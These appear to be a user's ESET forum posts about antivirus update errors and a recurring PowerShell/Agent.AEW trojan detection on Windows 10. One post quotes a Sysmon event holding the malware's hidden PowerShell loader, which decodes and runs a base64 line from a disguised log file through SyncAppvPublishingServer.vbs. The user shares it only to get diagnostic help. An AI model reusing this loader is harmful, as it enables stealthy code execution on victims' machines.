TedH600

Hello, The problem seems to be gone. Thank you.

Hello, I tried pinging a few of the Eset Livegrid servers as shown on https://support.eset.com/en/kb332-ports-and-addresses-required-to-use-your-eset-product-with-a-third-party-firewall, and I could reach them. Thank you for your help.

Hello, Eset seems to have started updating itself as of yesterday. But now I am receiving a message stating that "the Eset Liveguard servers cannot be reached". I am using Eset's own firewall. I have never seen this error before. Is something wrong with my new license? A screenshot is attached. Thank you for your help.

Hello, Running the task in task scheduler works. As I stated above, I haven't upgraded to the latest version because of the problem with the bogus error messages in Windows Event Viewer Eset logged every day. (I did try the latest version awhile back.) I have attached screenshots of my scheduler and update settings. I believe that this problem started shortly after my license was renewed. Thank you for your help.

Hello, I have a licensed version of Eset Smart Security Premium version 16.2.15.0. I renewed my license on 1/30/24. I am still using this older version because the latest version records bogus errors in the event log every day. Eset is not updating the detection engine automatically anymore. I just noticed this today. I have to update manually now. I tried clearing the update cache, but the problem persists. I checked the Eset scheduler and nothing seems to have changed. I am running Windows 10 Pro 64bit with all of the latest updates. I attached a log file. The first two entries are when I updated manually. Your help is appreciated.

Hello, I see that this has already been reported in https://forum.eset.com/topic/38760-windows-security-center-service-unable-to-load-instances-of-antivirusproduct-from-datastore/. Thank you.

Hello, I am receiving two Event Log errors with the descriptions "The Windows Security Center Service was unable to load instances of FirewallProduct from datastore" and "The Windows Security Center Service was unable to load instances of AntiVirusProduct from datastore" at every login with Eset Smart Security Premium version 17.0.15.0. I am running Windows 10 Pro 64 bit with all of the latest updates. Is Eset running and protecting my computer properly? Your help is appreciated.

Hello, The Netservices task seems to be a known virus as shown here https://forums.malwarebytes.com/topic/286247-netservices/. In the future, can Eset detect these task scheduler viruses before they are installed on the PC? Can I configure Eset to notify me of changes to the Task Scheduler? I saw this post https://forum.eset.com/topic/4602-windows-task-scheduler-protection/, but it is from 2015. Thank you again.

Hello, Deleting the task seems to have stopped the problem. Is there a way that I can quickly check for bogus tasks in case something like this happens again? By the way, my tasks files were stored in C:\Windows\System32\Tasks. I didn't have a "Scheduled Tasks" folder. What was the PowerShell/Agent.AEW trojan trying to do? If a new scan shows that my PC is clean, is the PC safe to use? Thank you very much.

Hello, I attached the log files from Eset and Autoruns above. I have noticed that the Windows tray icon that shows that my location is in use stays on until the Eset threat detection message displays. The Eset threat detection message shows up about 60 seconds after the desktop is displayed. Right after that, the location icon disappears. I don't know if the virus is accessing my location. As I said earlier, the sysmon event log that I posted above shows that this might be a Windows WMI virus. Thank you.

Hello, I deleted the C:\Windows\logs\system-logs.txt file. It no longer exists, but the virus keeps coming back upon reboot. The Eset virus detection keeps referencing the C:\Windows\logs\system-logs.txt file even though it does not exist. As I said earlier, the sysmon event log that I posted above shows that this might be a Windows WMI virus. Thank you.

Hello, I installed sysmon. There might be something hiding in Windows WMI. The following is a sysmon event I logged at Windows startup. - <Event xmlns="hxxp://schemas.microsoft.com/win/2004/08/events/event"> - <System> <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" /> <EventID>1</EventID> <Version>5</Version> <Level>4</Level> <Task>1</Task> <Opcode>0</Opcode> <Keywords>0x8000000000000000</Keywords> <TimeCreated SystemTime="2022-05-03T01:50:03.1731667Z" /> <EventRecordID>296</EventRecordID> <Correlation /> <Execution ProcessID="4876" ThreadID="5456" /> <Channel>Microsoft-Windows-Sysmon/Operational</Channel> <Computer>Linda-2</Computer> <Security UserID="S-1-5-18" /> </System> - <EventData> <Data Name="RuleName">-</Data> <Data Name="UtcTime">2022-05-03 01:50:03.166</Data> <Data Name="ProcessGuid">{d1df58dd-8a4b-6270-a800-00000000e205}</Data> <Data Name="ProcessId">10736</Data> <Data Name="Image">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data> <Data Name="FileVersion">10.0.19041.546 (WinBuild.160101.0800)</Data> <Data Name="Description">Windows PowerShell</Data> <Data Name="Product">Microsoft® Windows® Operating System</Data> <Data Name="Company">Microsoft Corporation</Data> <Data Name="OriginalFileName">PowerShell.EXE</Data> <Data Name="CommandLine">"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block}</Data> <Data Name="CurrentDirectory">C:\WINDOWS\system32\</Data> <Data Name="User">LINDA-2\Administrator</Data> <Data Name="LogonGuid">{d1df58dd-8a0f-6270-c39f-040000000000}</Data> <Data Name="LogonId">0x49fc3</Data> <Data Name="TerminalSessionId">1</Data> <Data Name="IntegrityLevel">High</Data> <Data Name="Hashes">SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F</Data> <Data Name="ParentProcessGuid">{d1df58dd-8a4b-6270-a700-00000000e205}</Data> <Data Name="ParentProcessId">10504</Data> <Data Name="ParentImage">C:\Windows\System32\wscript.exe</Data> <Data Name="ParentCommandLine">C:\WINDOWS\System32\WScript.exe "C:\Windows\System32\SyncAppvPublishingServer.vbs" "n; $a=Get-Content "C:\Windows\logs\system-logs.txt" | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block</Data> <Data Name="ParentUser">LINDA-2\Administrator</Data> </EventData> </Event> Thank you.

Hello, I have attached the C:\Windows\logs\system-logs.txt file. Eset found no viruses in it. Thank you. system-logs.txt

Hello, I have attached the Eset log collector data. Thank you. eis_logs.zip

Hello, What is PowerShell/Agent.AEW trojan? I can find no information on it. When Eset states that it deleted the threat, what file is it deleting? I renamed the C:\Windows\logs\system-logs.txt file referenced in the virus detection. It doesn't appear to have been recreated. Thank you.